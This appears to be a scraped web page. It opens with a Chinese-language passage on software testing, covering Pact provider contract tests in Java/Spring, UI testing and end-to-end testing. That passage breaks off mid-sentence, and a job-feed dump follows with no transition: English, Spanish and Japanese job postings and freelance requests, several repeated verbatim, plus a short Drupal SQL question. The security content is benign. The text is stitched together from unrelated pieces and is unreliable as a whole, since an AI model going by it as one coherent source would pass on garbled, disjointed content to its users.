很明显他们不会关注我们这个简单的示例代码库,也不会为我们实现 CDC 测试。这是公共 API 和组织内微服务的一大不同点。公共 API 不可能考虑到每一个消费方,否则他们就得整天忙于写测试了。而在我们自己组织内,你能够、也应该考虑每个消费方。你的应用一般只会服务于少量的,最多几十个消费方。为这些接口编写提供方测试应该不是太大的问题,这可以保证系统稳定。

提供方团队拿到协议文件后,会在他们的服务上运行一下。这需要实现一个提供方测试,在测试中读取协议文件,打桩隔离掉一些测试数据,运行他们的服务,并检查是否返回了协议文件中期望的结果。

Pact 团队写了一些库来实现提供方测试。他们在主GitHub 仓库写了一个很好的概览,告诉你有哪些消费方/提供方测试的库是可用的,你只需要从中选择适用于你技术栈的即可。

为了简单起见,我们假设 darksky 的 API 也是用 Spring Boot 来实现的。这样的话他们就可以用Spring pact provider来写,这个库和 Spring 的 MockMVC 机制做了很好的适配。我们假想 darksky.net 团队写了提供方测试,那么它大概长这样:

@RunWith(RestPactRunner.class)
@Provider("weather_provider") // same as the "provider_name" in our clientConsumerTest
@PactFolder("target/pacts") // tells pact where to load the pact files from
public class WeatherProviderTest {
    @InjectMocks
    private ForecastController forecastController = new ForecastController();

    @Mock
    private ForecastService forecastService;

    @TestTarget
    public final MockMvcTarget target = new MockMvcTarget();

    @Before
    public void before() {
        initMocks(this);
        target.setControllers(forecastController);
    }

    @State("weather forecast data") // same as the "given()" in our clientConsumerTest
    public void weatherForecastData() {
        when(forecastService.fetchForecastFor(any(String.class), any(String.class)))
                .thenReturn(weatherForecast("Rain"));
    }
}

你可以看到提供方测试必须做的就是两点:加载一个协议文件(例如,用@PactFolder注解来自动加载已下载好的协议文件)、提供需要准备的数据(例如使用 Mockito 来仿造)。此外,不需要再实现额外的测试,它会从协议文件自动派生出来。对于消费方测试里声明的提供方名称(provider name)和状态,提供方测试应该一一匹配。

提供方测试(我方团队)

我们已经看了如何测试我们服务和天气提供方之间的契约。对于这个接口,我们的服务扮演的是消费方,天气服务则扮演了提供方。考虑得更远一些,会发现我们的服务同时也是其他系统的提供方:我们为数个路径提供了 REST API 以供其他系统消费。

我们刚认识到了契约测试什么场景都能用,当然我们也会想给我们的契约写一写契约测试。幸运的是,我们使用了消费方驱动契约,所以我们手里有所有的消费方发过来的协议,可以用它们来实现我们的 REST API 提供方测试。

先把 pact-jvm-provider 库装上:

testCompile('au.com.dius:pact-jvm-provider-spring_2.12:3.5.5')

提供方测试的实现与前面所述的范式相同。为简单起见,我直接从simple consumer拿来一份协议文件放到了我们的仓库中,这会让我们操作起来简单一些。在真实的项目,你可能需要更完善的机制来分发协议文件。

@RunWith(RestPactRunner.class)
@Provider("person_provider")// same as in the "provider_name" part in our pact file
@PactFolder("target/pacts") // tells pact where to load the pact files from
public class ExampleProviderTest {

    @Mock
    private PersonRepository personRepository;

    @Mock
    private WeatherClient weatherClient;

    private ExampleController exampleController;

    @TestTarget
    public final MockMvcTarget target = new MockMvcTarget();

    @Before
    public void before() {
        initMocks(this);
        exampleController = new ExampleController(personRepository, weatherClient);
        target.setControllers(exampleController);
    }

    @State("person data") // same as the "given()" part in our consumer test
    public void personData() {
        Person peterPan = new Person("Peter", "Pan");
        when(personRepository.findByLastName("Pan")).thenReturn(Optional.of
                (peterPan));
    }
}

ExampleProviderTest需要做的事只有一件,那就是根据协议文件里的内容提供State信息。当我们运行提供方测试时,Pact 就会用到指定的协议文件,并发送 HTTP 请求到我们的服务,然后根据我们配置的 State 来决定响应。

UI 测试

大部分的应用都会有些用户界面。在 web 应用的上下文中,我们所谈的界面就是指网页界面。但人们经常会忘记,除了多彩的网页页面,还有许多的 REST API 界面或命令行界面等。

UI 测试测的是应用中的用户界面是否如预期工作。比如,用户的输入需要触发正确的动作,数据需要能展示给用户看,UI 的状态需要发生正确变化等。

有时候,人们提到 UI 测试和端到端测试时(比如 Mike Cohn)说的是一个东西。对我而言,这种观点混淆了这两个有交集的不同概念。

诚然,端到端的测试通常意味着会测到许多用户界面。但是反过来讲却并不能成立。

测试用户界面不必非得通过端到端的方式完成。根据技术栈不同,有时测试用户界面也可以很简单,只需要为前端的 JavaScript 代码写一些单元测试,同时用桩将后端隔离开即可。

对于传统的网页应用,UI 测试可以用Selenium这一类工具完成。如果你把 REST API 也当成一个用户界面,对你的 API 写一些恰当的集成测试可以达到完全相同的目的。

对于网页界面而言,你的 UI 大概可以围绕这几个部分进行测试:行为,布局,可用性,以及少数人认为需要测试的设计一致性。

幸运的是,测试用户界面的行为非常简单。点击一下,输入数据,然后看到用户界面状态如实变更。现代的单页应用框架(以react, vue.js, Angular等为代表)通常都会提供一些工具或组件,帮你从很低的测试层级(单元测试)对界面交互进行测试。即便你没有使用任何框架,只使用纯 JavaScript,也有常规的测试工具(如JasmineMocha等)可供选择。对于更传统一些的服务端渲染应用,使用 Selenium 会是最佳的选择。

测试应用的布局是否前后一致则有些困难。根据应用类型和用户需求的不同,也许你可能需要确保代码的更改不会意外破坏页面的布局。

问题是众所周知…计算机在检查某物「看起来是否不错」方面一直表现不佳(也许未来一些好的机器学习算法可以改善这一现状)。

如果你依然希望在构建流水线中集成自动化的测试来检查应用的设计,还是有些工具可以试一下。大部分的这些工具都是使用 Selenium 帮你在不同浏览器中打开应用、截图、跟之前的截图做对比。如果新旧截图的差异超过了预设阈值,工具就会告诉你。

Galen就是其中一种工具。即便你有特殊的需求,自己实现一套工具也不是很难。我之前工作过的一些团队就构建了lineup,以及基于 Java 的jlineup,用以实现类似的测试工具。如我前面所说,这两种工具都使用了 Selenium。

当你想测试可用性或一些「看起来对不对」的东西时,你已经超越了自动化测试的范畴。这是探索性测试,可用性测试(这甚至可以像走廊测试那般简单)的领域。你需要给你的用户展示产品,看看他们是否喜欢使用它,有没有什么功能会让他们在使用时感到困惑或恼火。

端到端测试

通过用户界面测试一个已部署好的应用,可以说是最端到端的方式了。前面说的以 webdriver 驱动的 UI 测试就是一个很好的端到端测试案例。

(端到端测试测试了整个的、完全集成了的系统)

端到端测试(也被称为广域栈测试)会赋予你极大的信心,让你了解软件是否正常工作。SeleniumWebDriver 协议使你能够针对部署好的服务进行自动化测试,它能启动一个无头(headless)浏览器来对用户界面执行点击、输入、检查状态的操作。当然你也可以直接使用 Selenium,或者用类似Nightwatch这种基于 Selenium 的工具。

端到端测试也有它特有的一些问题。众所周知,它们通常比较脆弱,经常因为一些意料之外的问题挂掉。并且这些错误信息通常不是真正的原因所在。用户界面越复杂,测试常常越是脆弱。浏览器差异、时间(时序)问题、元素渲染、意外的弹出框…这还仅是列表一角,已经让我经常花大量时间进行调试,这实在令人沮丧。

在微服务的世界中,谁负责写这些测试也是一个大问题。因为端到端测试覆盖到数个服务(整个系统),导致编写端到端测试不是任何一个团队的责任。

如果你们有一个集中的质量保障团队,由他们来编写端到端测试看起来就不错。但是呢,拥有一个集中式的 QA 团队同时也是一种明显的反模式,这根本不应该出现在 DevOps 的世界中。你的团队应该是真正的跨职能团队。回答谁该对端到端测试负责这个问题并不容易。也许你的组织里会有一些社区实践,或有个质量协会之类的机构能为此负责。一个合适的答案,与你的组织本身高度相关。

此外,端到端测试还需要大量的维护成本,运行起来也相当慢。试想一下这样的场景,除非只有几个微服务,否则你根本没办法在本地运行端到端测试,因为你需要启动所有的服务。祝你的机器能同时跑起几百个应用,并且内存没被撑爆。

因其高昂的维护成本,你应该尽量将端到端测试的数量减少到最低限度。

考虑一下应用中对用户而言具有高价值的交互。定义好产品产生核心价值的用户旅程,然后将这些旅程

          Codeigniter customise Income and Expense Web app      Cache   Translate Page      
I need an experienced PHP codeigniter developer with a good understanding of Microsoft Excel functionality to build a web data entry and processing application for Income and Expense Management Details... (Budget: $30 - $250 USD, Jobs: Codeigniter, HTML, MySQL, PHP)
          Codeigniter customise Income and Expense Web app      Cache   Translate Page      
I need an experienced PHP codeigniter developer with a good understanding of Microsoft Excel functionality to build a web data entry and processing application for Income and Expense Management Details... (Budget: $30 - $250 USD, Jobs: Codeigniter, HTML, MySQL, PHP)
          Desarrollador programador Wordpress Woocommerce Senior      Cache   Translate Page      
Chas Consulting - Barracas, Buenos Aires - Trabajo en equipo, reporte de horas, avances, desarrollo y mantención de portales Buscamos programadores/as desarrolladores/as con amplios conocimientos de Laravel, PHP, Wordpress, Woocommerce, css, jquery, MySQL. Responsable de generar páginas webs de diseño actual y amplia...
          SOLVED: how to 'UNpromote all" to front page      Cache   Translate Page      

I've migrated a bunch of content into a Drupal 8 install. Most everything has been 'promoted to front page.'

I need to un-promote everything. I have the option to 'bulk update fields' but that field is not an option. I could do the edit via MySQL, but I'm struggling to find where this is in the database before doing a update query. I imagine something like "UPDATE node SET promote = 0" but I'm not sure I'm in the right place, as that doesn't work.

UPDATE: scratch that.. figured it out. I was close. I had to keep digging and found the table : UPDATE node_field_data SET promote = 0

Drupal version: 

          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Add bouqet acces to our iptv addon      Cache   Translate Page      
Hello, We are using IPTV in kodi, we use amember as a membership program. we have added a test bouqet for 3 days in our iptv plugin. im able to see the bouqet, but the new added ID needs to have premmission... (Budget: €8 - €30 EUR, Jobs: Linux, MySQL, PHP, Software Architecture)
          (USA-CA-San Diego) #95903 System Administrator and Project Coordinator      Cache   Translate Page      
#95903 System Administrator and Project Coordinator Filing Deadline: Tue 10/23/2018 Apply Now UCSD Layoff from Career Appointment: Apply by 10/11/18 for consideration with preference for rehire. All layoff applicants should contact their Employment Advisor. Special Selection Applicants: Apply by 10/23/18. Eligible Special Selection clients should contact their Disability Counselor for assistance. DESCRIPTION The UCSD School of Medicine is involved in development of several bioinformatic resources for network analysis that are widely used by the biological research community. The best known is Cytoscape (http://www.cytoscape.org), a collaborative open-source software project. Cytoscape is a leading workstation-based platform for visualizing and processing complex networks. It is widely used with approximately 17,000 downloads per month. NDEx, the Network Data Exchange (http://ndexbio.org), is another major project, a public web resource for sharing, storing, accessing, and publishing biological knowledge as computable networks. The System Administrator and Project Coordinator (SAPC) will manage, maintain and extend the computing infrastructure, both hardware and software, and they will support the users of that infrastructure. The System Administrator and Project Coordinator (SAPC) will work with the software development team to deploy and administrate cloud hosted websites and services, including usage analysis and reporting. Finally, the SAPC will coordinate the software release process for the web and desktop products of the software development team, including the management of issue tracking and user bug reporting. Lab infrastructure system administration: The SAPC will administrate scientific computing infrastructure that includes the secure compute clusters, a VM cluster, a GPU server, lab workstations and compute servers, and multiple storage servers. Most of the systems are housed at the San Diego Supercomputing Center (SDSC). Administration will include maintenance of the rack-mounted systems at SDSC, diagnosing hardware problems, replacing components and installing new systems. The SAPC will work with stakeholders to design hardware and software solutions as the infrastructure evolves to meet new demands. They will manage the purchasing process and interface with vendors for warranty support. They will monitor alerts and performance metrics and will plan and manage data and image backup. They will manage the user authentication system, gateway computers, the firewall, VPN, samba server, IP allocation and Hostmaint. They will control the configuration of all systems, using tools such as Puppet. The SAPC will also maintain the documentation for the systems, including hardware configuration. Lab user support: The SAPC will install and maintain user workstations and other computers onsite. They will control the software configuration of these systems, including the installation of commonly used packages. They will diagnose problems and install and replace hardware. They will assist lab members in the configuration of personal machines for interfacing to the lab infrastructure. They will maintain and extend user documentation for lab computing. They will assist in the IT issues encountered when installing or maintaining scientific instruments in the wet lab, including interfacing with vendors for support and managing regular backups of attached computers. The SAPC will manage user accounts and commercial software used in the lab. They will monitor the usage of the lab computing infrastructure and assist users in using those systems, answering questions, fielding bug reports and otherwise responding to requests. Cloud website and service system administration: The SAPC will administrate websites and web services hosted on cloud providers including AWS and Google. They will track usage of these systems, using both standard tools and custom logging and reporting systems. They will prepare periodic reports of usage, working with the software development team to plan and implement appropriate metrics. They will perform backups, respond to outages, and work with the software development team to make the deployed systems robust and secure. Coordination of software release process and issue tracking: The SAPC will work with the software development team to maintain and administrate internal issue tracking systems and end-user bug and issue reporting systems. They will manage aspects of the software release process, including maintaining schedules, organizing and tracking testing, and performing final deployment to the web. MINIMUM QUALIFICATIONS + Bachelor's degree in Computer Science or Computer Engineering or equivalent combination of education and experience + Two (2) or more years of system/database administration experience. + General knowledge of several areas of IT. + Demonstrated ability to install software and troubleshoot and repair moderately complex problems with computing devices, peripherals and software. Understanding of system performance monitoring and actions that can be taken to improve or correct performance. Basic knowledge of incident response procedures. Demonstrated ability to follow software specifications Including windows and OS/X operating systems. + Demonstrated experience with database administration. Including SQL databases such as MySQL, Postgres + Demonstrated knowledge of computer security tools, best practices and policies. Demonstrated skills applying security controls to computer software and hardware. Examples: user authentication systems, gateway computers, firewalls, VPNs + Demonstrated testing and test planning skills. + Ability to write technical documentation in a clear and concise manner. + Demonstrated understanding of how system management actions affect users and dependent / related functions. + Interpersonal skills sufficient to work with both technical and non-technical personnel at various levels in the organization. Ability to elicit and communicate technical and non-technical information in a clear and concise manner. + Self-motivated and works independently and as part of a team. Demonstrates problem-solving skills. Able to learn effectively and meet deadlines. + Experience with UNIX systems administration, including installation, backups, upgrades and maintenance. Also including experience administrating clusters + Experience using GitHub or other version control software in multi-user projects, especially for periodically released software. + Experience maintaining medium scale cluster hardware, small numbers of rack-mounted systems. Including diagnosis of hardware problems, replacing components and installation of new hardware. + Experience deploying and maintaining basic websites and/or web services via apache or other webservers or hosted on cloud providers such as AWS and Google. + Experience in supporting end users in both software and / or hardware issues. + Experience using issue tracking systems such as Jira, Redmine, Asana PREFERRED QUALIFICATIONS + Experience in purchasing of hardware and software, interfacing with vendors, managing warranties and vendor support. + Experience with VM clusters (including software such as VMWare) and GPU servers + Experience working with stakeholders to design hardware and software solutions in computing infrastructure + Experience working with large RAID systems or other redundant or high performance cluster storage hardware and software. + Experience working with GPFS, and other cluster storage software. + Experience with remote monitoring software like Ganglia, Nagios, etc. + Experience with Puppet or other administration automation software + Experienced in webserver configuration, Docker deployment, scalable clusters, Solr or Lucene search engine databases. + Experience with logging and usage tracking systems for webservers, websites, including the analysis of usage and the preparation of relevant reports. + Knowledge of bioinformatics software packages and applications + Experience managing or participating in software releases. + Knowledge of business processes and procedures. Knowledge of the design, development and application of technology and systems to meet business needs. + Knowledge relating to the design and development of software. Basic knowledge of secure software development. + Knowledge of data management systems, practices and standards. SPECIAL CONDITIONS + Employment is subject to a criminal background check. Apply Now UC San Diego Health is the only academic health system in the San Diego region, providing leading-edge care in patient care, biomedical research, education, and community service. Our facilities include two university hospitals, a National Cancer Institute-designated Comprehensive Cancer Center, Shiley Eye Institute, Sulpizio Cardiovascular Center, and several outpatient clinics. UC San Diego Medical Center in Hillcrest is a designated Level I Trauma Center and has the only Burn Center in the county. We invite you to join our dynamic team! Applications/Resumes are accepted for current job openings only. For full consideration on any job, applications must be received prior to the initial closing date. If a job has an extended deadline, applications/resumes will be considered during the extension period; however, a job may be filled before the extended date is reached. UC San Diego Health is an Equal Opportunity/Affirmative Action Employer. All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, age, protected veteran status, gender identity or sexual orientation. For the complete University of California nondiscrimination and affirmative action policy see: http://www-hr.ucsd.edu/saa/nondiscr.html UC San Diego is a smoke and tobacco free environment. Please visit smokefree.ucsd.edu for more information. Payroll Title: INFO SYS ANL 2 Department: MEDICINE/Genetics Salary Range Commensurate with Experience Worksite: La Jolla Appointment Type: Career Appointment Percent: 100% Union: Uncovered Total Openings: 1 Work Schedule: Days, 8 hrs/day, Mon-Fri As a federally-funded institution, UC San Diego Health maintains a marijuana and drug free campus. New employees are subject to drug screening.
          (USA-CA-Livermore) Livermore Computing Accounts Specialist      Cache   Translate Page      
Livermore Computing Accounts Specialist Location: Livermore, CA Category: Technicians/IT Organization: Computation Posting Requirement: External w/ US Citizenship Job ID: 104342 Job Code: Computer Support Technologist (525.2) / Sr Comp Support Technologist (525.3) Date Posted: October 09 2018 Share this Job Apply Now Apply For This Job Science and Technology on a Mission! For more than 60 years, the Lawrence Livermore National Laboratory (LLNL) has applied science and technology to make the world a safer place. We have an opening for a Livermore Computing (LC) Accounts Specialist to provide general tier 1 technical support for approximately 3,500 users of the LC supercomputing systems. You will be responsible for providing support by phone, in person or through email to answer and resolve requests for all LC account services provided by the LC Hotline. This position is in the Customer Service Group within the Livermore Computing Division of the Computation Directorate. This position will be filled at either the 525.2 or 525.3 level depending on your qualifications. Additional job responsibilities (outlined below) will be assigned if you are selected at the higher level. Essential Duties - Support the administration of LC user accounts, OTP tokens, banks, UNIX groups, and shared directories, while ensuring users are equipped to efficiently and effectively use computers. - Provide excellent customer service and support a diverse user community to answer and resolve customer calls and requests, document all service calls and solutions, and research and troubleshoot LC account issues. - Provide general technical support to solve technical problems of moderate complexity within the LC user community in support of all of the account services - Document and maintain LC Accounts Specialists’ email templates, processes, and procedures. - Maintain appropriate technology, computer security, and safety training. - Process account and UNIX group creations and deletions via the LC Identity Management tool. - Perform other duties as assigned. In Addition at the 525.3 Level - Provide advanced technical assistance to the LC user community by answering calls, emails, and self service requests from users. - Collaborate on implementation of improvements to existing procedures and tools. - Develop scripts to automate LC Accounts Specialists’ support processes. Qualifications - Associate’s degree in a Computer or Engineering related field or the equivalent combination of education, technical training and related experience. - Experience working with customers, addressing issues, and managing customer requests on the phone, via email and/or in person. - General working knowledge of the Linux, Windows and Macintosh Operating systems. - Experience resolving moderately complex problems with a focus on details to ensure follow-through to assure problems are resolved. - Experience writing technical solutions and commercial knowledgebase articles. - Ability to develop and follow detailed policies and procedures. - Experience and knowledge of the skills needed for a customer support role to include a focus on listening, rapport-building, good written and verbal communication skills with the ability to communicate with individuals with all levels of technical and non-technical skill sets. Display a friendly and approachable nature and the ability to show courtesy and patience under stress. - Ability to work with other members of the LC division, LC Computer Coordinators and PI’s. In Addition at the 525.3 Level - Ability to evaluate existing operational procedures and develop and implement process improvement changes to improve LC Hotline operations. - Strong analytical and troubleshooting skills, attention to detail, consistent resolution of problems. - Advanced written and verbal communication skills with the ability to communicate with individuals with all levels of technical and non-technical skill sets. Desired Qualifications - Advanced knowledge of the Linux operating system, Microsoft Office Suite and Service Now incident management system - Experience working at a service desk. - Experience using mysql or similar database. Pre-Employment Drug Test: External applicant(s) selected for this position will be required to pass a post-offer, pre-employment drug test. Security Clearance: This position requires a Department of Energy (DOE) Q-level clearance. If you are selected, we will initiate a Federal background investigation to determine if you meet eligibility requirements for access to classified information or matter. In addition, all L or Q cleared employees are subject to random drug testing. Q-level clearance requires U.S. citizenship. If you hold multiple citizenships (U.S. and another country), you may be required to renounce your non-U.S. citizenship before a DOE L or Q clearance will be processed/granted. Note: This is a Career Indefinite position. Lab employees and external candidates may be considered for this position. About Us Lawrence Livermore National Laboratory (LLNL), located in the San Francisco Bay Area (East Bay), is a premier applied science laboratory that is part of the National Nuclear Security Administration (NNSA) within the Department of Energy (DOE). LLNL's mission is strengthening national security by developing and applying cutting-edge science, technology, and engineering that respond with vision, quality, integrity, and technical excellence to scientific issues of national importance. The Laboratory has a current annual budget of about $1.8 billion, employing approximately 6,500 employees. LLNL is an affirmative action/ equal opportunity employer. All qualified applicants will receive consideration for employment without regard to race, color, religion, marital status, national origin, ancestry, sex, sexual orientation, gender identity, disability, medical condition, protected veteran status, age, citizenship, or any other characteristic protected by law.
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Tableau Developer      Cache   Translate Page      
CA-Redwood City, Redwood City, California Skills : Tableau, SSRS development, Data visualization, SQL Server, Redshift, Athena, MySQL and Analytics Description : Required Qualifications: • 5-7 years of development experience in Tableau • 3-4 years of development experience in Tableau and SSRS development. • 2+ years of experience with BI UX design. • 2+ years of experience with Analytics. • Experience with data vi
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Hotel rereservation system      Cache   Translate Page      
I want to make a website of hotel reservation system using PHP, MYSQL, HTML, JAVASCRIPT. (Budget: ₹600 - ₹1500 INR, Jobs: HTML, Javascript, MySQL, PHP)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          (USA-AL-Huntsville) Software Engineer (MSIC)      Cache   Translate Page      
Software Engineer (MSIC) Tracking Code 3204-987 Job Description Founded in 1980, COLSA Corporation’s team of engineers, analysts and professionals across the US provide government and commercial customers with the latest and most sophisticated engineering, programmatic, and information technology services. Centered at the core of its values, COLSA knows its people are its most valuable resource. In addition to receiving a competitive compensation package, our employees enjoy offerings such as flexible work schedules, paid time off, benefits that begin on the date of hire, recognition programs, tuition and certification assistance, and immediate vesting in our matching 401(k) plan. Our WE CARE Wellness program provides support and initiatives to empower employees and their families to live healthy, balanced lives and our Association of COLSA Employees (ACE) provides a fun way for employees and their families to come together in times of both celebration and need. We invite you to connect your talents with opportunity, and be a part of our “Family of Professionals,” in supporting cutting-edge initiatives! General SummaryDesigns, develops, troubleshoots and analyzes software programs for computer based systems.Principal Duties and Responsibilities (*Essential functions) * Investigate and use new technologies to revitalize existing data systems.* Designs and develops software programs ** Analyzes user''s software program needs and assists in troubleshooting ** Design and develops software using basic compilers, assemblers, utility programs and operating systems ** May provide input for documentation of new or existing programs * Assist in monitoring data system behavior and web application(s) performance/function, including server configuration. * Design and develop software using basic compilers, assemblers, utility programs and operating systems. * Integrate and test software components and tools. * Develop new utility tools and existing tool enhancements as identified. * Use expertise in XML data handling and processing and also relational database usage. * Interact with data customers, helping to ensure the locating and retrieving of data is successful. * Interact with government agencies as required to facilitate data contributions into data system. Required Experience Required Qualifications * Bachelor's degree in computer science, information systems, engineering, business, or other related field or equivalent experience. * Two years applicable software design engineering experience * Working knowledge of current operating systems and programming languages * Active Top Secret clearance with immediate eligibility for DIA-SCI access. * Ability to pass a Counter Intelligence (CI) Polygraph within 60 days of hire. * Ability to obtain and maintain Security + CE within 6 months of hire. Preferred Qualifications * Experience with XML, Perl, PHP, JavaScript, XML, XSLT, Java, MySQL (relational databases) * Experience working in a classified computing environment * Active CompTIA Security+ CE * Currently active TS/SCI * Current Counter Intelligence (CI) Polygraph Applicant selected will be subject to a government security investigation and must meet eligibility requirements for access to classified information. COLSA Corporation is an Equal Opportunity Employer, Minorities/Females/Veterans/Disabled. All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, sexual orientation, gender identity, or national origin. Job Location Huntsville, Alabama, United States Position Type Full-Time/Regular
          本気で自分を成長させたいエンジニアインターン大募集! by 株式会社CoinOtaku      Cache   Translate Page      
コインオタクでは、仮想通貨に関する定量データを収集・解析し、仮想通貨毎に評価付け・価格予測をするサービスを提供しております。 機械学習による市場予測や通貨の将来性に対する評価は、ゴールドマンサックスなどの証券会社や銀行、Googleなどのテックジャイアントが精力的に開発を進めている分野であり、その開発を仮想通貨領域において行なっているのが弊社です。 現状の成果としては、数百種の仮想通貨に対して、 開発力、 性能、 市場からの評価、 コミュニティの活発さ、 マイニングの現状 将来的な実需、 などの観点から分析を行い、偏差値という形で評価を出し、有料コンテンツとして提供しております。 また、10種以上の取引所から価格情報を取得し機械学習させることでバックテストで月数10パーセントのリターンを出すアルゴリズムの作成をしております。 仮想通貨に対して正当な評価を下すことが極めて難しい市場の中で、 ビッグデータを用いて仮想通貨市場を解明したい方、そしてそれを多くのユーザーに届けたい方、ぜひご応募ください! ▼業務で使用する技術・ツール ・基礎技術  ・機械学習  ・ウェブ ・使用言語  ・Python3  ・Javascript ・ライブラリ  ・Flask  ・Vue  ・Nuxt  ・Express ・インフラ  ・EC2  ・S3  ・RDS  ・Redis  ・MySQL ▼必須項目 ・Python/Javascriptいずれかでの開発経験 ▼推奨項目 ・AWSなどのインフラに関する知識 ・機械学習・統計に関する知識 ▼求める人物 ・仮想通貨に対する興味がある方 ・大胆にチャレンジし、多くの失敗から学べる方 ・チームのために、自ら考え、自ら動き、率先して成功のために行動できる方 ・オーナーシップを持って業務に励み、ベストを尽くすための努力を惜しまない方 ぜひ一緒に仮想通貨市場を解明し、市場に対して説得力のある答えを提供することで市場の発展を支えましょう!ご応募をお待ちしています! ーーーーーーーーーーーーーーーーーーーーーー コインオタクのお仕事に少しでも興味を持たれた方へ ーーーーーーーーーーーーーーーーーーーーーー コインオタクは、本気で【世界一の仮想通貨情報サービス】を目指しています。 この目的を共有し、それを本気で実現しようとしている学生たちで構成されています。 そして、結果も着実に出ています。 他の学生インターンとは異なり裁量権の重さ、達成感、充足感は段違いのものになっています。 少しでもこの目的を実現したい、その過程で様々なスキルセットを学び成長したいと思う部分があれば、ぜひ「話を聞きたい」ボタンを押してみてください。 長くなりましたが、ここまで読んでいただきありがとうございました。 メンバー一同、あなたからのご応募を心よりお待ちしています。
          新規開発で力をつけたい!アジャイル開発をしたいWEBエンジニア募集! by 株式会社mofmof      Cache   Translate Page      
■募集の背景 弊社の開発サービス「開発チームレンタル」には、大変ありがたいことに「新規事業をやりたいが普通の開発会社じゃムリなのでお願いしたい」というような依頼が多数寄せられております。 事業の拡大に伴い、エンジニア不足でお受け出来るキャパシティが足りない状況となったことから、WEBエンジニアの採用活動を強化しています。 ■仕事内容 弊社の事業「開発チームレンタル」の週2.5日〜週5日で月額制受託開発の担当をお願いしたいと思っています。 〜「開発チームレンタル」はレンタルといいつつも客先常駐ではなく、全て弊社内で開発しております〜 新規事業に特化した開発スタイルで、あえて3ヶ月先以内の短いスパンで計画を立て、ミニマムでのリリースをして、顧客からのフィードバックをより早く得ることに価値の重みを置いた作り方をしています。 新規事業においては、綿密な設計書や管理体制はむしろ逆効果になることがわかっているので、可能な限り保守性が高く読みやすいコードを書くように努力し、作成するドキュメントは、開発のために必要なドキュメントや、コミュニケーションのために必要なドキュメントのみに絞り、不毛なドキュメント作成が発生しないように工夫しています。 スクラムの考え方をベースにしたチーム作りをしており、決められた期間にどこまで開発出来るかにコミットする作り方ではなく、決められた期間に対して、何を優先するか、しないかを常に見直し続けながら開発します。これにより無茶でムダな作り込みを減らしています。 クライアント(プロダクトオーナー)を含めて2〜6名くらいの小規模チームで開発することが多く、週次で必ずミーティングを開催し、仕様の詳細や目的、優先順位について対話することを重要視しているため、「誰がなぜ」その機能を必要としているかがブラックボックスにならず、クライアントやエンドユーザーに近い位置で仕事をすることが出来ます。 ■使用している言語・フレームワーク ・Ruby ・Ruby on Rails ・MySQL or Postgres ・Heroku ・Amazon Web Services 基本的には最新バージョンを使い、開発中のプロジェクトであれば、原則常に最新バージョンにアップグレードするという方針にしております。 オンプレによるインフラは非効率的でかつメンテナブルでないし時代遅れなので、HerokuかAWSを使用出来ない案件は受注していません。 ■ツールなど ・GitHub ・Pivotal Tracker ・Slack ・Circle CI ・Wercker ■開発するサービス 詳細は個々の案件によりますが、全てRuby on Railsを用いたWEBアプリケーション開発になります。 過去の事例 ・新卒学生と企業のイベントマッチングサービス ・電子書籍の販売プラットフォームサービス ・ECサービス ・クラウド上のインフラ構成管理サービス ・トレンドファッションのメディアサービス など ■必須のスキル・経験 ・Rails未経験可 ・WEBアプリケーションフレームワークの実務経験(Laravel, Struts, CakePHPなどでも可) ・週2.5日以上稼働できること ・社会人経験 ■歓迎のスキル・経験 ・Ruby on Railsの実務経験(年数は問わない) ・スクラム開発の経験 ・機械学習 ■mofmofの働き方の特徴 ・週1日(火曜日)リモートワークデーを実施してます。 ・服装や髪型自由です。 ・時短勤務や時差勤務も可能です(利用実績あり) ・複業もOK ・定時帰宅推奨してます! ・月2回無料マッサージ制度あり
          名古屋で活躍したいVR・AR・Web開発エンジニアを募集! by 株式会社 アイデアクラウド      Cache   Translate Page      
